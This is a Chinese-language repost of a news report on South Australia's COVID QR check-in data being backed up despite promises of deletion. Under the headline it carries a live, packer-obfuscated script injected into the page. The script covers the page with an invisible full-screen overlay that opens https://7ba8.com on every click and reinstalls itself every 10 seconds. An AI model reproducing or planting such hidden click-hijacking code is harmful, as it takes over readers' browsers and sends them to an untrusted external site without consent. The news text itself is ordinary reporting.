南澳二维码签到备份数据存在安全隐患！

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>

警察局长Grant Stevens对二维码签到发起了强有力的辩护，称他对该系统有信心。

The Advertiser周二独家披露，该州的首席审计师发现，从二维码收集的个人数据没有按照法律规定销毁。

周二提交给州议会的为期7个月的审查报告，也暴露了南澳卫生部在控制Covid-19记录方面的数据 &quot;缺陷&quot;。

Grant Stevens先生为QR系统辩护，并说数据存储的 &quot;险恶 &quot;观点令人失望。

Grant Stevens先生告诉ABC电台的Ali Clarke说：&quot;令人失望的是，这种，怎么说呢，阴险的观点被放在数据管理的方式上。&quot;

&quot;我绝对相信，销毁数据的意图和承诺正在得到兑现。&quot;

当局表示，在任何罕见的恢复过程中，超过28天的数据都会被自动删除。

Grant Stevens先生说，每隔28至35天就会删除数据，以便在系统崩溃时保持一个缓冲。

&quot;每28天，在28天后的7天内，所以在35天内，数据就会消失，&quot;他说。

&quot;在这段时间之后，没有人可以访问这些数据。&quot;

&quot;对于任何复杂的IT系统来说，他们备份数据是一个自然的要求，所以如果出现灾难性的系统故障，他们可以检索数据，并在从备份中检索到这些数据时恢复系统，&quot;Stevens先生说。

&quot;我们可能拥有澳大利亚最好的QR系统，而且管理得非常好。&quot;

早些时候，The Advertiser披露，该州的首席审计员发现，从二维码收集的个人数据没有按照法律规定销毁，而南澳卫生部对Covid-19记录的控制不力，有可能 &quot;泄露 &quot;敏感信息。

尽管州政府一再保证电子联系人追踪记录在28天后被删除，但官方审查发现签到细节被秘密地备份。

虽然审计长Andrew Richardson说这对帮助在任何灾难或系统故障后恢复关键信息 &quot;至关重要&quot;，但政府从未公开披露这一要求。

周二提交给州议会的为期7个月的审查报告，也暴露了南澳卫生部的数据 &quot;缺陷&quot;。

Richardson先生的审查报告于4月被The Advertiser披露，他赞扬了去年12月在使用 &quot;行业最佳实践 &quot;的六周工作后快速推出的Covid-Safe应用程序。

他说，&quot;合理的控制 &quot;保护了用户记录，包括电话号码、数据清除和用户审查适当，同时技术加密也很安全。

当局表示，二维码对于快速追踪任何Covid疫情中的联系人至关重要。

总理和内阁部表示，当不需要追踪接触者时，所有备份数据将被销毁。

最新的数据显示，在90,200个公共场所有近4.3亿个签到记录。

超过3.754亿条记录已经从数据库中清除，然后储存起来。

调查人员对该数据库的 &quot;内在风险 &quot;表示关注，并提出了21项发现--13项关键发现--包括未能正式进行风险检查。

这份长达44页的报告发现，有28名南澳卫生部工作人员使用个人电子邮件地址访问机密记录，而345名机构用户拥有 &quot;不适当的 &quot;数据权限，包括28名管理员。

报告说，这 &quot;增加了 &quot;数据泄露或非法使用的风险。它说：&quot;这可能损害敏感信息的保密性、完整性或可用性。&quot;

​但没有发现违规行为。

SA Health的决定—— &quot;无限期 &quot;保留二维码数据 &quot;不符合 &quot;国家记录法，而一个小企业单位可以访问记录，尽管声称这只是为了联系追踪器。

官员们说，各种审查将根据其结果对该系统进行检修。

南澳卫生部的一位女发言人说，签到数据就像保密的健康记录，受到州法律的保护。

她说：&quot;QR签到信息只有在向南澳州卫生局提出要求时才会被公布，用于官方接触者追踪目的或管理Covid-19疫情，&quot;她说。

&quot;一旦为此目的获得信息，它将作为机密的健康记录进行管理，并受到2008年《保健法》的保护。&quot;

警务专员和州协调人Grant Stevens告诉调查组，所有11项建议都将得到落实。

官员们说，DPC安全地备份了所有关键系统，包括Covid-安全签到系统。

DPC的一位发言人说。&quot;州政府向南澳大利亚人保证，他们的签到数据超过了追踪联系人所需的28天期限，就无法获取。&quot;

但工党卫生发言人 Chris Picton指责政府 &quot;违反了信任&quot;。

他说：&quot;在这次疫情期间，南澳大利亚人做了正确的事情，他们签到并向政府真诚地提供了他们的数据，并承诺他们的数据只用于接触追踪的目的，然后在28天后销毁。&quot;

&quot;对于南澳大利亚人的数据是否安全，存在着......严重的问题。&quot;

​图文来源：The Advertiser

原文链接